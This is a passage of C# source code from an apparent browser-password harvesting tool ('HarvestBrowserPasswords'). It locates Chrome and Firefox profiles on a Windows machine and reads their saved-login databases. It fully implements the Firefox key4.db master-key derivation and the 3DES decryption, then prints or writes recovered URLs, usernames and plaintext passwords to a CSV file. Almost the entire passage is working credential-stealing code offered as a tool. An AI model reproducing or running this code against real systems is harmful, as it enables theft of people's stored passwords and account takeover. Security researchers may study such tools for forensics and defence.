bool IsAdministrator() 92 | { 93 | var identity = WindowsIdentity.GetCurrent(); 94 | var principal = new WindowsPrincipal(identity); 95 | return principal.IsInRole(WindowsBuiltInRole.Administrator); 96 | } 97 | 98 | public static List GetChromePasswords(string userAccountName) 99 | { 100 | List chromeProfiles = FindChromeProfiles(); 101 | 102 | List loginDataList = new List(); 103 | 104 | foreach (string chromeProfile in chromeProfiles) 105 | { 106 | string loginDataFile = chromeProfile + @"\Login Data"; 107 | if (File.Exists(loginDataFile)) 108 | { 109 | Console.ForegroundColor = ConsoleColor.Green; 110 | Console.WriteLine($"[+] Found Chrome credential database for user: \"{userAccountName}\" at: \"{loginDataFile}\""); 111 | Console.ResetColor(); 112 | 113 | ChromeDatabaseDecryptor decryptor = new ChromeDatabaseDecryptor(loginDataFile); 114 | 115 | loginDataList = (loginDataList.Concat(decryptor.ChromeLoginDataList)).ToList(); 116 | } 117 | else 118 | { 119 | Console.ForegroundColor = ConsoleColor.Red; 120 | Console.WriteLine($"[-] No credential database found in chrome profile {chromeProfile}"); 121 | Console.ResetColor(); 122 | } 123 | } 124 | 125 | return loginDataList; 126 | } 127 | 128 | public static List FindChromeProfiles() 129 | { 130 | string localAppData = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData); 131 | string chromeDirectory = localAppData + @"\Google\Chrome\User Data"; 132 | 133 | List profileDirectories = new List(); 134 | 135 | if (Directory.Exists(chromeDirectory)) 136 | { 137 | //Add default profile location once existence of chrome directory is confirmed 138 | profileDirectories.Add(chromeDirectory + "\\Default"); 139 | foreach (string directory in Directory.GetDirectories(chromeDirectory)) 140 | { 141 | if (directory.Contains("Profile ")) 142 | { 143 | profileDirectories.Add(directory); 144 | 145 | } 146 | } 147 | } 148 | 149 | return profileDirectories; 150 | } 151 | 152 | //Overload for case where master password is set 153 | public static List GetFirefoxPasswords(string userAccountName, string masterPassword) 154 | { 155 | List loginDataList = new List(); 156 | 157 | foreach (string profile in FindFirefoxProfiles(userAccountName)) 158 | { 159 | FirefoxDatabaseDecryptor decryptor = new FirefoxDatabaseDecryptor(profile, masterPassword); 160 | 161 | try 162 | { 163 | //Take the list of logins from this decryptor and add them to the total list of logins 164 | loginDataList = (loginDataList.Concat(decryptor.FirefoxLoginDataList)).ToList(); 165 | } 166 | catch (ArgumentNullException) 167 | { 168 | //ArgumentNullException will be thrown when no key4.db file exists in a profile directory 169 | Console.ForegroundColor = ConsoleColor.Red; 170 | Console.WriteLine($"[-] Could not find key4.db for profile: {profile}"); 171 | } 172 | 173 | } 174 | 175 | return loginDataList; 176 | } 177 | 178 | public static List FindFirefoxProfiles(string userAccountName) 179 | { 180 | //List to store profile directories 181 | List profileDirectories = new List(); 182 | 183 | //Roaming directory contains most firefox artifacts apart from cache 184 | string roamingDir = $"C:\\Users\\{userAccountName}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"; 185 | 186 | //Check roaming profile 187 | if (Directory.Exists(roamingDir)) 188 | { 189 | 190 | string[] roamingProfiles = Directory.GetDirectories(roamingDir); 191 | foreach (string directory in roamingProfiles) 192 | { 193 | profileDirectories.Add(directory); 194 | } 195 | } 196 | 197 | return profileDirectories; 198 | } 199 | 200 | public static string GetCurrentUser() 201 | { 202 | //Get username for currently running account (SamCompatible Enum format) 203 | string userAccountSamCompatible = System.Security.Principal.WindowsIdentity.GetCurrent().Name; 204 | 205 | //Remove domain and backslashes from name 206 | int index = userAccountSamCompatible.IndexOf("\\", 0, userAccountSamCompatible.Length) + 1; 207 | string userAccountName = userAccountSamCompatible.Substring(index); 208 | 209 | return userAccountName; 210 | } 211 | 212 | private static void PrintLoginsToConsole(List loginDataList) 213 | { 214 | 215 | string line = new string('=', 60); 216 | 217 | Console.ForegroundColor = ConsoleColor.White; 218 | Console.WriteLine(line); 219 | 220 | foreach (BrowserLoginData loginData in loginDataList) 221 | { 222 | Console.WriteLine($"URL {loginData.FormSubmitUrl}"); 223 | Console.WriteLine($"Username {loginData.Username}"); 224 | Console.WriteLine($"Password {loginData.Password}"); 225 | Console.WriteLine($"Browser {loginData.Browser}"); 226 | Console.WriteLine(line); 227 | } 228 | 229 | Console.ResetColor(); 230 | } 231 | 232 | private static void PrintHelpToConsole() 233 | { 234 | Console.ForegroundColor = ConsoleColor.White; 235 | Console.WriteLine("OPTIONS:"); 236 | Console.WriteLine(" -c, --chrome Locate and decrypt Google Chrome logins\n"); 237 | Console.WriteLine(" -f, --firefox Locate and decrypt Mozilla Firefox logins\n"); 238 | Console.WriteLine(" -a, --all Locate and decrypt Google Chrome and Mozilla Firefox logins\n"); 239 | Console.WriteLine(" -p, --password (Optional) Master password for Mozilla Firefox Logins\n"); 240 | Console.WriteLine(" -o, --outfile Write output to csv\n"); 241 | Console.WriteLine(" --help Display help message"); 242 | 243 | Console.ResetColor(); 244 | } 245 | 246 | private static void WriteToCSV(List loginDataList, string outfile) 247 | { 248 | Console.ForegroundColor = ConsoleColor.Yellow; 249 | Console.WriteLine($"[*] Writing decrypted logins to {outfile}"); 250 | Console.ResetColor(); 251 | 252 | try 253 | { 254 | using (StreamWriter file = new StreamWriter(outfile)) 255 | { 256 | file.WriteLine("URL,Username,Password,Browser"); 257 | 258 | foreach (BrowserLoginData loginData in loginDataList) 259 | { 260 | file.WriteLine($"{loginData.FormSubmitUrl}," + 261 | $"{loginData.Username}," + 262 | $"{loginData.Password}," + 263 | $"{loginData.Browser}"); 264 | } 265 | } 266 | } 267 | catch (Exception e) 268 | { 269 | Console.ForegroundColor = ConsoleColor.Red; 270 | Console.WriteLine(e); 271 | Console.ResetColor(); 272 | } 273 | } 274 | } 275 | } 276 | -------------------------------------------------------------------------------- /FirefoxDatabaseDecryptor.cs: -------------------------------------------------------------------------------- 1 | using Newtonsoft.Json; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Data.SQLite; 5 | using System.IO; 6 | using System.Linq; 7 | using System.Security.Cryptography; 8 | using System.Text; 9 | 10 | namespace HarvestBrowserPasswords 11 | { 12 | public class FirefoxDatabaseDecryptor 13 | { 14 | private string ProfileDir { get; set; } 15 | private string Key4dbpath { get; set; } 16 | private byte[] GlobalSalt { get; set; } 17 | private byte[] EntrySaltPasswordCheck { get; set; } 18 | private byte[] EntrySalt3DESKey { get; set; } 19 | private byte[] CipherTextPasswordCheck { get; set; } 20 | private byte[] CipherText3DESKey { get; set; } 21 | private string MasterPassword { get; set; } 22 | private byte[] DecryptedPasswordCheck { get; set; } 23 | private byte[] Decrypted3DESKey { get; set; } 24 | public List FirefoxLoginDataList { get; set; } 25 | 26 | public FirefoxDatabaseDecryptor(string profile, string password) 27 | { 28 | ProfileDir = profile; 29 | Key4dbpath = ProfileDir + @"\key4.db"; 30 | MasterPassword = password; 31 | 32 | //Check profile for key4 database before attempting decryption 33 | if (File.Exists(Key4dbpath)) 34 | { 35 | Console.ForegroundColor = ConsoleColor.Green; 36 | Console.WriteLine($"[+] Found Firefox credential database at: \"{Key4dbpath}\""); 37 | Console.ResetColor(); 38 | 39 | // If Firefox version >= 75.0, asn.1 parser will throw IndexOutOfRange exception when trying to parse encrypted data as asn.1 DER encoded 40 | try 41 | { 42 | Key4DatabaseConnection(Key4dbpath); 43 | } 44 | catch(IndexOutOfRangeException e) 45 | { 46 | Console.ForegroundColor = ConsoleColor.Red; 47 | Console.WriteLine($"[-] Could not correctly parse the contents of {Key4dbpath} - possibly incorrect Firefox version."); 48 | Console.ResetColor(); 49 | } 50 | 51 | 52 | //Store a RootObject from FirefoxLoginsJSON (hopefully) containing multiple FirefoxLoginsJSON.Login instances 53 | FirefoxLoginsJSON.Rootobject JSONLogins = GetJSONLogins(ProfileDir); 54 | 55 | //Decrypt password-check value to ensure correct decryption 56 | DecryptedPasswordCheck = Decrypt3DES(GlobalSalt, EntrySaltPasswordCheck, CipherTextPasswordCheck, MasterPassword); 57 | 58 | if (PasswordCheck(DecryptedPasswordCheck)) 59 | { 60 | //Decrypt master key (this becomes padded EDE key for username / password decryption) 61 | //Master key should have 8 bytes of PKCS#7 Padding 62 | Decrypted3DESKey = Decrypt3DES(GlobalSalt, EntrySalt3DESKey, CipherText3DESKey, MasterPassword); 63 | 64 | //Check for PKCS#7 padding and remove if it exists 65 | Decrypted3DESKey = Unpad(Decrypted3DESKey); 66 | 67 | FirefoxLoginDataList = new List(); 68 | 69 | Console.ForegroundColor = ConsoleColor.Yellow; 70 | foreach (FirefoxLoginsJSON.Login login in JSONLogins.Logins) 71 | { 72 | try 73 | { 74 | if (!(login.FormSubmitURL.Equals(null))) 75 | { 76 | byte[] usernameBytes = Convert.FromBase64String(login.EncryptedUsername); 77 | byte[] passwordBytes = Convert.FromBase64String(login.EncryptedPassword); 78 | 79 | ASN1 usernameASN1 = new ASN1(usernameBytes); 80 | 81 | byte[] usernameIV = usernameASN1.RootSequence.Sequences[0].Sequences[0].OctetStrings[0]; 82 | byte[] usernameEncrypted = usernameASN1.RootSequence.Sequences[0].Sequences[0].OctetStrings[1]; 83 | 84 | //Extract password ciphertext from logins.json 85 | ASN1 passwordASN1 = new ASN1(passwordBytes); 86 | 87 | byte[] passwordIV = passwordASN1.RootSequence.Sequences[0].Sequences[0].OctetStrings[0]; 88 | byte[] passwordEncrypted = passwordASN1.RootSequence.Sequences[0].Sequences[0].OctetStrings[1]; 89 | 90 | string decryptedUsername = Encoding.UTF8.GetString(Unpad(Decrypt3DESLogins(usernameEncrypted, usernameIV, Decrypted3DESKey))); 91 | string decryptedPassword = Encoding.UTF8.GetString(Unpad(Decrypt3DESLogins(passwordEncrypted, passwordIV, Decrypted3DESKey))); 92 | 93 | BrowserLoginData loginData = new BrowserLoginData(login.FormSubmitURL, decryptedUsername, decryptedPassword, "Firefox"); 94 | FirefoxLoginDataList.Add(loginData); 95 | } 96 | } 97 | catch (NullReferenceException) 98 | { 99 | 100 | } 101 | } 102 | Console.ResetColor(); 103 | } 104 | } 105 | else 106 | { 107 | Console.ForegroundColor = ConsoleColor.Red; 108 | Console.WriteLine($"[-] No credential database found for Firefox profile: {ProfileDir}"); 109 | Console.ResetColor(); 110 | } 111 | } 112 | 113 | // read logins.json file and deserialize the JSON into FirefoxLoginsJSON class 114 | public FirefoxLoginsJSON.Rootobject GetJSONLogins(string profileDir) 115 | { 116 | 117 | if (File.Exists(profileDir + @"\logins.json")) 118 | { 119 | //Read logins.json from file and deserialise JSON into FirefoxLoginsJson object 120 | string file = File.ReadAllText(profileDir + @"\logins.json"); 121 | FirefoxLoginsJSON.Rootobject JSONLogins = JsonConvert.DeserializeObject(file); 122 | 123 | return JSONLogins; 124 | } 125 | else 126 | { 127 | throw new FileNotFoundException($"Could not find file '{profileDir}\\logins.json.\nUnable to decrypt logins for this profile.'"); 128 | } 129 | 130 | } 131 | 132 | public void Key4DatabaseConnection(string key4dbPath) 133 | { 134 | SQLiteConnection connection = new SQLiteConnection( 135 | $"Data Source={key4dbPath};" + 136 | $"Version=3;" + 137 | $"New=True"); 138 | 139 | try 140 | { 141 | connection.Open(); 142 | 143 | //First query the metadata table to verify the master password 144 | SQLiteCommand commandPasswordCheck = connection.CreateCommand(); 145 | commandPasswordCheck.CommandText = "SELECT item1, item2 FROM metadata WHERE id = 'password'"; 146 | SQLiteDataReader dataReader = commandPasswordCheck.ExecuteReader(); 147 | 148 | //Parse the ASN.1 data in the 'password' row to extract entry salt and cipher text for master password verification 149 | while (dataReader.Read()) 150 | { 151 | GlobalSalt = (byte[])dataReader[0]; 152 | 153 | //https://docs.microsoft[.]com/en-us/dotnet/api/system.security.cryptography.asnencodeddata?view=netframework-4.8#constructors 154 | byte[] item2Bytes = (byte[])dataReader[1]; 155 | 156 | ASN1 passwordCheckASN1 = new ASN1(item2Bytes); 157 | 158 | EntrySaltPasswordCheck = passwordCheckASN1.RootSequence.Sequences[0].Sequences[0].Sequences[0].OctetStrings[0]; 159 | CipherTextPasswordCheck = passwordCheckASN1.RootSequence.Sequences[0].Sequences[0].Sequences[0].OctetStrings[1]; 160 | } 161 | 162 | //Second, query the nssPrivate table for entry salt and encrypted 3DES key 163 | SQLiteCommand commandNSSPrivateQuery = connection.CreateCommand(); 164 | commandNSSPrivateQuery.CommandText = "SELECT a11 FROM nssPrivate"; 165 | dataReader = commandNSSPrivateQuery.ExecuteReader(); 166 | 167 | //Parse the ASN.1 data from the nssPrivate table to extract entry salt and cipher text for encrypted 3DES master decryption key 168 | while (dataReader.Read()) 169 | { 170 | byte[] a11 = (byte[])dataReader[0]; 171 | 172 | ASN1 masterKeyASN1 = new ASN1(a11); 173 | 174 | EntrySalt3DESKey = masterKeyASN1.RootSequence.Sequences[0].Sequences[0].Sequences[0].OctetStrings[0]; 175 | CipherText3DESKey = masterKeyASN1.RootSequence.Sequences[0].Sequences[0].Sequences[0].OctetStrings[1]; 176 | } 177 | } 178 | catch (IndexOutOfRangeException) 179 | { 180 | 181 | throw new IndexOutOfRangeException(); 182 | } 183 | catch (Exception e) 184 | { 185 | Console.ForegroundColor = ConsoleColor.Red; 186 | Console.WriteLine($"[-] {e.Message}"); 187 | Console.ResetColor(); 188 | } 189 | finally 190 | { 191 | connection.Dispose(); 192 | } 193 | } 194 | 195 | public static byte[] Decrypt3DES(byte[] globalSalt, byte[] entrySalt, byte[] cipherText, string masterPassword) 196 | { 197 | //https://github[.]com/lclevy/firepwd/blob/master/mozilla_pbe.pdf 198 | 199 | byte[] password = Encoding.UTF8.GetBytes(masterPassword); 200 | byte[] hashedPassword; 201 | byte[] keyFirstHalf; 202 | byte[] keySecondHalf; 203 | byte[] edeKey; 204 | byte[] decryptedResult; 205 | 206 | //Hashed Password = SHA1(salt + password) 207 | byte[] hashedPasswordBuffer = new byte[globalSalt.Length + password.Length]; 208 | //Copy salt into first chunk of new buffer 209 | Buffer.BlockCopy(globalSalt, 0, hashedPasswordBuffer, 0, globalSalt.Length); 210 | //Copy password into second chunk of buffer 211 | Buffer.BlockCopy(password, 0, hashedPasswordBuffer, globalSalt.Length, password.Length); 212 | hashedPassword = hashedPasswordBuffer; 213 | 214 | using (SHA1 sha1 = new SHA1CryptoServiceProvider()) 215 | { 216 | hashedPassword = sha1.ComputeHash(hashedPassword); 217 | } 218 | 219 | //Combined Hashed Password = SHA1(hashedpassword + entrysalt) 220 | byte[] combinedHashedPassword = new byte[hashedPassword.Length + entrySalt.Length]; 221 | Buffer.BlockCopy(hashedPassword, 0, combinedHashedPassword, 0, hashedPassword.Length); 222 | Buffer.BlockCopy(entrySalt, 0, combinedHashedPassword, hashedPassword.Length, entrySalt.Length); 223 | 224 | using (SHA1 sha1 = new SHA1CryptoServiceProvider()) 225 | { 226 | combinedHashedPassword = sha1.ComputeHash(combinedHashedPassword); 227 | } 228 | 229 | //Create paddedEntrySalt 230 | byte[] paddedEntrySalt = new byte[20]; 231 | Buffer.BlockCopy(entrySalt, 0, paddedEntrySalt, 0, entrySalt.Length); 232 | 233 | //Create and join the two halves of the encryption key 234 | try 235 | { 236 | using (HMACSHA1 hmac = new HMACSHA1(combinedHashedPassword)) 237 | { 238 | //First half of EDE Key = HMAC-SHA1( key=combinedHashedPassword, msg=paddedEntrySalt+entrySalt) 239 | byte[] firstHalf = new byte[paddedEntrySalt.Length + entrySalt.Length]; 240 | Buffer.BlockCopy(paddedEntrySalt, 0, firstHalf, 0, paddedEntrySalt.Length); 241 | Buffer.BlockCopy(entrySalt, 0, firstHalf, paddedEntrySalt.Length, entrySalt.Length); 242 | 243 | //Create TK = HMAC-SHA1(combinedHashedPassword, paddedEntrySalt) 244 | keyFirstHalf = hmac.ComputeHash(firstHalf); 245 | byte[] tk = hmac.ComputeHash(paddedEntrySalt); 246 | 247 | //Second half of EDE key = HMAC-SHA1(combinedHashedPassword, tk + entrySalt) 248 | byte[] secondHalf = new byte[tk.Length + entrySalt.Length]; 249 | Buffer.BlockCopy(tk, 0, secondHalf, 0, entrySalt.Length); 250 | Buffer.BlockCopy(entrySalt, 0, secondHalf, tk.Length, entrySalt.Length); 251 | 252 | keySecondHalf = hmac.ComputeHash(secondHalf); 253 | 254 | //Join first and second halves of EDE key 255 | byte[] tempKey = new byte[keyFirstHalf.Length + keySecondHalf.Length]; 256 | Buffer.BlockCopy(keyFirstHalf, 0, tempKey, 0, keyFirstHalf.Length); 257 | Buffer.BlockCopy(keySecondHalf, 0, tempKey, keyFirstHalf.Length, keySecondHalf.Length); 258 | 259 | edeKey = tempKey; 260 | } 261 | 262 | byte[] key = new byte[24]; 263 | byte[] iv = new byte[8]; 264 | 265 | //Extract 3DES encryption key from first 24 bytes of EDE key 266 | Buffer.BlockCopy(edeKey, 0, key, 0, 24); 267 | 268 | //Extract initialization vector from last 8 bytes of EDE key 269 | Buffer.BlockCopy(edeKey, (edeKey.Length - 8), iv, 0, 8); 270 | 271 | using (TripleDESCryptoServiceProvider tripleDES = new TripleDESCryptoServiceProvider 272 | { 273 | Key = key, 274 | IV = iv, 275 | Mode = CipherMode.CBC, 276 | Padding = PaddingMode.None 277 | }) 278 | { 279 | ICryptoTransform cryptoTransform = tripleDES.CreateDecryptor(); 280 | decryptedResult = cryptoTransform.TransformFinalBlock(cipherText, 0, cipherText.Length); 281 | } 282 | } 283 | catch (Exception e) 284 | { 285 | Console.WriteLine($"Exception {e}"); 286 | decryptedResult = null; 287 | } 288 | Console.ResetColor(); 289 | return decryptedResult; 290 | } 291 | 292 | public static byte[] Decrypt3DESLogins(byte[] cipherText, byte[] iv, byte[] key) 293 | { 294 | byte[] decryptedResult = new byte[cipherText.Length]; 295 | 296 | try 297 | { 298 | using (TripleDESCryptoServiceProvider tripleDES = new TripleDESCryptoServiceProvider 299 | { 300 | Key = key, 301 | IV = iv, 302 | Mode = CipherMode.CBC, 303 | Padding = PaddingMode.None 304 | }) 305 | { 306 | ICryptoTransform cryptoTransform = tripleDES.CreateDecryptor(); 307 | decryptedResult = cryptoTransform.TransformFinalBlock(cipherText, 0, cipherText.Length); 308 | } 309 | } 310 | catch (Exception e) 311 | { 312 | Console.ForegroundColor = ConsoleColor.Red; 313 | Console.WriteLine($"[-] {e.Message}"); 314 | Console.ResetColor(); 315 | } 316 | return decryptedResult; 317 | } 318 | 319 | public static bool PasswordCheck(byte[] passwordCheck) 320 | { 321 | //checkValue = "password-check\x02\x02" 322 | byte[] checkValue = new byte[] { 0x70, 0x61, 0x73, 0x73, 0x77, 0x6f, 0x72, 0x64, 0x2d, 0x63, 0x68, 0x65, 0x63, 0x6b, 0x02, 0x02 }; 323 | 324 | if (passwordCheck.SequenceEqual(checkValue)) 325 | { 326 | Console.ForegroundColor = ConsoleColor.Green; 327 | Console.WriteLine("[+] Password Check success!"); 328 | Console.ResetColor(); 329 | 330 | return true; 331 | } 332 | else 333 | { 334 | Console.ForegroundColor = ConsoleColor.Red; 335 | Console.WriteLine("[-] Password Check Fail..."); 336 | Console.ResetColor(); 337 | 338 | return false; 339 | } 340 | } 341 | 342 | public byte[] Unpad(byte[] key) 343 | { 344 | bool paddingCheck = true; 345 | 346 | //Check integer value of last byte of array 347 | int paddingValue = key[key.Length - 1]; 348 | byte[] unpadded = new byte[key.Length - paddingValue]; 349 | 350 | //Check last n bytes of key for equality where n = integer value of last byte 351 | for (int i = 1; i < (paddingValue + 1); i++) 352 | { 353 | if (!(key[key.Length - i] == paddingValue)) 354 | { 355 | Console.ForegroundColor = ConsoleColor.Red; 356 | Console.WriteLine($"[-] Unpad() Error: Incorrect or Nil padding applied to byte array:\n{BitConverter.ToString(key)}"); 357 | Console.ResetColor(); 358 | //Throw exception here 359 | paddingCheck = false; 360 | } 361 | } 362 | 363 | if (paddingCheck) 364 | { 365 | //Create new bytearray with trailing padding bytes removed 366 | Buffer.BlockCopy(key, 0, unpadded, 0, unpadded.Length); 367 | } 368 | 369 | return unpadded; 370 | } 371 | } 372 | } 373 | --------------------------------------------------------------------------------